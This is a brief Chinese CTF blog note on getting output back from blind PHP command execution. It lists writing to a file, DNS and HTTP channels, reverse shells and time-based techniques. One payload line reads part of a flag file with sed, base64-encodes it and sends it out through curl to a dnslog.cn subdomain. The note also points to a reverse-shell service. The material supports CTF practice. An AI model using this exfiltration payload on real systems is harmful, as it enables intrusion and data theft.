PHP命令执行不回显
方法:
1.写入文件
1 | >:写入文件 最好写入.txt中 |
2.dns通道
当文件内容过长时无法全部回带,可以使用sed -n部分回带
例子:
1 | url+?cmd=a=`sed -n "3,4p" fla?.php|base64`;curl ${a:0:10}.m1237r.dnslog.cn |
3.当dns被过滤时,可以使用http通道:
4.反弹shell
还可以使用ctfshow专用反弹shell:https://your-shell.com/
5.时间盲注
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 linlimei!